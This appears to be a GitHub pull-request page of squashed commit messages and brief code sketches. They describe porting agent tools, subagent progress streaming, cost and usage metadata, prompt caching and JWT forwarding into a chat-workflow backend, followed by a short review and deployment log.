**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool-call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-`streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent.
The subagent tool set deliberately EXCLUDES:

- task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel.
  api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence.
Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow.

New (SRP, one function per file):

- lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.
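The sketch below shows a pointwise sum of usage records in the spirit of `addLanguageModelUsage`, together with an `addTokenCounts` helper like the one a later commit extracts. `UsageLike` is a deliberately simplified, hypothetical stand-in and not the AI SDK's `LanguageModelUsage` type, which also nests token-detail objects. The `sumLanguageModelUsage` wrapper follows the later Bundle B description: it handles undefined inputs without inventing zero-token placeholders.

```typescript
// Simplified stand-in for a usage record: every count is optional.
interface UsageLike {
  inputTokens?: number;
  outputTokens?: number;
  totalTokens?: number;
  cacheReadTokens?: number;
  cacheWriteTokens?: number;
}

const USAGE_KEYS = [
  "inputTokens",
  "outputTokens",
  "totalTokens",
  "cacheReadTokens",
  "cacheWriteTokens",
] as const;

// Sum two optional counts; stay undefined only when neither side reported one.
function addTokenCounts(a?: number, b?: number): number | undefined {
  if (a === undefined && b === undefined) return undefined;
  return (a ?? 0) + (b ?? 0);
}

function addLanguageModelUsage(a: UsageLike, b: UsageLike): UsageLike {
  const sum: UsageLike = {};
  for (const key of USAGE_KEYS) {
    const value = addTokenCounts(a[key], b[key]);
    if (value !== undefined) sum[key] = value;
  }
  return sum;
}

// Accumulate across steps without turning "no data yet" into zeros.
function sumLanguageModelUsage(a?: UsageLike, b?: UsageLike): UsageLike | undefined {
  if (!a) return b;
  if (!b) return a;
  return addLanguageModelUsage(a, b);
}
```

Leaving unreported counts absent, rather than zero, lets a UI tell "the provider reported no cache reads" apart from "no data".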
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:

- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so:

- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly)

Production code changes for the SDK upgrade:

- runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594)

Convert taskTool.execute from `async () =>` to `async function*`, mirroring open-agents' `packages/agent/tools/task.ts`.
Yields multiple chunks during the subagent run so the chat UI can render:

- An initial "Subagent · 0 tools · 0 tokens" card with stable startedAt timestamp
- A live `pending: {name, input}` indicator for each tool-call
- Accumulated `usage` after each finish-step
- A final `{final: ModelMessage[], ...}` chunk containing the full subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the last assistant text part from `output.final` for inclusion in the parent agent's context.

New (SRP, one function per file):

- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps addLanguageModelUsage to handle undefined inputs without introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was `(output) =>` from the older beta SDK era. The current SDK (ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to `({ output }) =>` so the function actually receives the user's answers at runtime — was previously falling through to the generic "User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9 askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597)

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7)

Third open-agents → api cutover bundle. The handler hardcoded `workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set `currentBranch`, so the agent had no environment info in its system prompt and had to run `pwd` / `git branch` on every turn.

Production verification (today, before this fix):

  agent: "My system prompt does not contain working directory or branch information."
After this fix the agent receives an Environment section + Current branch line + cloud-sandbox checkpointing block — same shape as open-agents (sandbox.recoupable.com) emits.

Changes:

- New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles environment section → Current branch → cloud-sandbox checkpointing → custom instructions, all conditional on inputs. Mirrors open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts).
- New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}` placeholder substitution.
- `handleChatWorkflowStream`: connect the sandbox once for both skill discovery AND cwd/branch reading, then thread real values into `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves today's behavior; tools surface real errors later when they reconnect).
- `runAgentStep`: build the system prompt via `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})` instead of using the static `agentCustomInstructions` directly.

Scope reduced from the original "A.7+9" bundle: dropped contextLimit plumbing because it's a client-side display concern in open-agents, not server-side model routing (verified via grep — open-agents' server never reads context.contextLimit either).

Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring); full suite 3121/3121 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore(chat-workflow): drop currentBranch handling from system prompt

Per direction: branch is always `main` (the default branch) in api's deployment topology, so the per-branch `Current branch: <name>` line and cloud-sandbox checkpointing block don't add information today. Strip the templating to keep the system prompt focused on what's load-bearing (the Environment section indicating workspace-relative paths).
- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real per-session branch)
- Drop `currentBranch` from `buildAgentSystemPrompt` options + rendering
- Stop reading `sandbox.currentBranch` in handleChatWorkflowStream (the field stays on AgentContext.sandbox for type completeness; also consumed by createSandboxHandler unchanged)
- Remove branch-related test cases

Can be re-added later if/when meaningful per-session branches (e.g. xx/abcdef12 generated branches) land.

Tests: 3119/3119 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call

Build failure on bf1e245 — runAgentStep was still passing `currentBranch: input.agentContext.sandbox.currentBranch` after buildAgentSystemPrompt's option was removed. Stripping it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): Anthropic prompt cache control (Bundle A.6) (#599)

Fourth open-agents → api cutover bundle. runAgentStep was sending the same system prompt + tool definitions on every turn as fresh input, even though Anthropic prompt caching can cut the cost of cached input tokens by up to 90%. Production traces showed `cacheReadTokens: 0` on every api turn, while open-agents shows cacheRead matching cacheWrite from the prior turn — i.e. open-agents reuses the cached prefix.

Changes (SRP — one function per file):

- `lib/agent/contextManagement/isAnthropicModel.ts` — predicate port of open-agents' `packages/agent/context-management/cache-control.ts:5`.
- `lib/agent/contextManagement/addCacheControlToTools.ts` — marks the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only conserves Anthropic's 4-breakpoint limit.
- `lib/agent/contextManagement/addCacheControlToMessages.ts` — marks the LAST message with `cacheControl` on every step, per Anthropic's "mark the final block of the final message" guidance.

`runAgentStep` now:

- Wraps the tool set via `addCacheControlToTools(...)` before passing to streamText (static — set once per step).
- Adds a `prepareStep` callback that wraps `messages` via `addCacheControlToMessages(...)` on every internal model call.

Production behavior reproducer (Haiku 4.5, identical 2-turn prompt to both backends):

  api prod (broken):
    turn1 cacheWrite=0 cacheRead=0 cost=$0.005952
    turn2 cacheWrite=0 cacheRead=0 cost=$0.005959
    → flat cost; full input billed every turn.

  open-agents prod:
    turn1 cacheWrite=10966 cacheRead=0
    turn2 cacheWrite=12 cacheRead=10966 cost drops 12x
    → near-full prefix re-read from cache on turn 2.

After this PR, api should match open-agents' caching curve.

Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5 addCacheControlToMessages + 2 runAgentStep wiring assertions); full suite 3138/3138 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): forward Privy JWT as RECOUP_ACCESS_TOKEN (Bundle A.4) (#601)

Fifth and final open-agents → api cutover bundle. The chat UI sends a short-lived Privy JWT in the workflow request body as `recoupAccessToken`. Today api silently strips it via Zod's default `.strip()` mode and never plumbs it into the sandbox env, so the `recoup-api` skill's curl examples can't authenticate as the user.

Production reproducer (today, before this fix):

  api prod: recoup-api skill loads. curl returns "RECOUP_ACCESS_TOKEN is not set" → 401. Agent: "you need to sign in."
  open-agents prod: recoup-api skill loads. curl returns HTTP 200 with the user's account_id.

Plumbing (all three layers TDD red → green):

- lib/chat/validateChatWorkflow.ts — accept `recoupAccessToken: z.string().min(1).max(8192).optional()` in the body schema. Open-agents-shape compatible.
- lib/agent/tools/AgentContext.ts — add `recoupAccessToken?: string` field. Mirrors open-agents' `packages/agent/types.ts:29`.
- lib/chat/handleChatWorkflowStream.ts — conditionally spread the token into `agentContext` when the validator surfaced it.
- lib/agent/tools/buildRecoupExecEnv.ts — inject `RECOUP_ACCESS_TOKEN` into the sandbox exec env when the field is set. The recoup-api skill's curl examples reference this env var.

Security note: only forward the token when the caller sent it in the body (chat UI path). x-api-key callers don't set this field, so their long-lived `recoup_sk_…` key is never exfiltratable from the sandbox env. Maintained from the prior code comment.

Tests: 5 new (3 buildRecoupExecEnv + 1 validator + 1 handler); plus 1 handler omit-when-undefined assertion. Full suite 3144/3144 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
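The conditional injection in `buildRecoupExecEnv` can be sketched as follows. The `baseEnv` parameter and the `ExecEnvContext` shape are hypothetical. The sketch illustrates the security note: the variable exists only when the request body carried a token, so callers authenticated by `x-api-key` never get a credential in the sandbox env.

```typescript
// Only the field this sketch needs; the real AgentContext has more.
interface ExecEnvContext {
  recoupAccessToken?: string;
}

function buildRecoupExecEnv(
  ctx: ExecEnvContext,
  baseEnv: Record<string, string> = {},
): Record<string, string> {
  // Copy so the caller's object is never mutated.
  const env: Record<string, string> = { ...baseEnv };
  // Absent (or empty) token: leave the variable unset rather than set it to "".
  if (ctx.recoupAccessToken) {
    env.RECOUP_ACCESS_TOKEN = ctx.recoupAccessToken;
  }
  return env;
}
```

Omitting the key entirely, rather than setting it to an empty string, means a skill's curl command fails with a clear "not set" condition instead of sending an empty bearer token.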

cubic-dev-ai Bot reviewed May 21, 2026

vercel Bot deployed to Preview May 21, 2026 18:43

cubic-dev-ai Bot reviewed May 21, 2026

sweetmantech merged commit 51fd649 into test May 21, 2026
6 checks passed

sweetmantech deleted the feat/api-chat-workflow-leaf-tools branch May 21, 2026 18:49

sweetmantech mentioned this pull request May 21, 2026

release: 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (#585) #586

Merged

sweetmantech commented May 21, 2026 • edited by cubic-dev-ai Bot

Summary by cubic

vercel Bot commented May 21, 2026 • edited

coderabbitai Bot commented May 21, 2026 • edited

Rate limit exceeded

sweetmantech commented May 21, 2026

Multi-tool E2E verified on preview ✅

Tools the agent autonomously invoked

Model wrap-up (`finishReason: "stop"`)

Tools not exercised in this E2E

Verification recap

cubic-dev-ai Bot left a comment • edited

cubic-dev-ai Bot left a comment

sweetmantech commented May 21, 2026

E2E: all 8 tools verified end-to-end

Tool execution

Model wrap-up

Coverage summary across both E2E runs
